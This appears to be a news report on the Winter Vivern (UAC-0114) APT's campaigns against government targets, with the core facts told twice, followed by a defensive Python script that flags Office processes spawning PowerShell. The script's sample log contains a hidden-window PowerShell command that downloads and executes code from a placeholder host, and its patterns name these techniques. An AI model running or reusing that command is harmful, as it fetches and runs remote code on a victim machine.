Winter Vivern, also known as UAC-0114, is an advanced persistent threat that has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021. The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News.

"Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said.

Winter Vivern drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif.

Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents containing XLM macros to deploy PowerShell implants on compromised hosts. While the origins of the threat actor are unknown, the attack patterns suggest that the cluster is aligned with objectives that support the interests of the Belarusian and Russian governments.

UAC-0114 has employed a variety of methods, ranging from phishing websites to malicious documents, that are tailored to the targeted organization to distribute its custom payloads and gain unauthorized access to sensitive systems.

Winter Vivern, or UAC-0114, is an advanced persistent threat that has been linked to several high-profile campaigns against government officials. The group, which is believed to be operating out of Belarus or Russia, has been active since at least 2021 and has targeted government agencies and officials in Poland, Ukraine, Italy, and India. The group is believed to be behind a recent campaign that used a piece of malware dubbed Aperetif to target state authorities in Ukraine and Poland.
Winter Vivern has employed a variety of methods to distribute its malware and gain unauthorized access to sensitive systems. These methods have included phishing websites and malicious documents tailored to the specific organization being targeted. In some cases, the group has leveraged weaponized Microsoft Excel documents containing XLM macros in order to deploy PowerShell implants on compromised hosts. The origins of Winter Vivern are currently unknown, but the group's attack patterns suggest that it is aligned with the interests of the Belarusian and Russian governments. The group has been increasingly active in recent months, and it is likely that we will see more high-profile attacks from this group in the future.
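The delivery chain the report describes (an Excel document with XLM macros that deploys a PowerShell implant) has one observable a defender can act on regardless of the document's contents: XLM macro code runs inside Excel, so the implant shows up as a script host spawned by an Office process. The following detection logic is an added example, not code from the original article or from SentinelOne or CERT-UA; it scores constructed process-creation events in a simplified key=value form (an assumption of this example, not a real Sysmon or EDR log format) and flags Office-to-script-host parent/child pairs, adding weight for the command-line traits such implants commonly carry.

```python
"""Score process-creation events for an Office process spawning a script host.

Added example for the Winter Vivern article. The log format, host names, paths
and command lines below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Office binaries that should not normally launch a scripting host.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Script hosts and living-off-the-land launchers worth flagging as children.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# Command-line traits that raise the score; none is required for an alert.
SUSPICIOUS_FLAGS = [
    re.compile(r"-(?:e|en|enc|encodedcommand)\s", re.I),   # encoded command
    re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),   # hidden window
    re.compile(r"-(?:nop|noprofile)\b", re.I),              # profile suppressed
    re.compile(r"downloadstring|invoke-webrequest|iwr\b|net\.webclient", re.I),
]


@dataclass
class ProcEvent:
    host: str
    parent: str   # parent image basename, lower-cased
    image: str    # child image basename, lower-cased
    cmdline: str


# Constructed sample events (hypothetical hosts and paths, not real telemetry).
SAMPLE_LOG = """\
host=ws01 parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -nop -w hidden -enc SQBFAFgA..."
host=ws01 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -File C:\\scripts\\backup.ps1"
host=ws02 parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE image=C:\\Windows\\splwow64.exe cmdline="splwow64.exe 12288"
host=ws03 parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
"""

LINE_RE = re.compile(r'host=(\S+) parent=(.+?) image=(.+?) cmdline="(.*)"$')


def parse_line(line):
    """Parse one constructed key=value event; return None for malformed lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host, parent, image, cmdline = m.groups()
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    return ProcEvent(host=host, parent=basename(parent), image=basename(image), cmdline=cmdline)


def score_event(ev):
    """Return 0 for benign pairs; otherwise a base score plus 2 per suspicious trait."""
    if ev.parent not in OFFICE_PARENTS or ev.image not in SCRIPT_HOSTS:
        return 0
    score = 5  # the parent/child relationship alone is worth an alert
    for pat in SUSPICIOUS_FLAGS:
        if pat.search(ev.cmdline):
            score += 2
    return score


def detect(log_text, threshold=5):
    """Return (host, parent, child, score) for every event at or above threshold."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        s = score_event(ev)
        if s >= threshold:
            alerts.append((ev.host, ev.parent, ev.image, s))
    return alerts


if __name__ == "__main__":
    for host, parent, child, score in detect(SAMPLE_LOG):
        print(f"{host}: {parent} -> {child} (score {score})")
```

The parent/child relationship is the durable signal and is scored on its own; the command-line traits only add weight, because an implant launched through an intermediate `cmd.exe` or with an unencoded command line would otherwise slip below the threshold. In the sample, the `explorer.exe` launch of a scheduled backup script and Excel spawning the print helper `splwow64.exe` both score 0, while the two Office-to-script-host events are flagged.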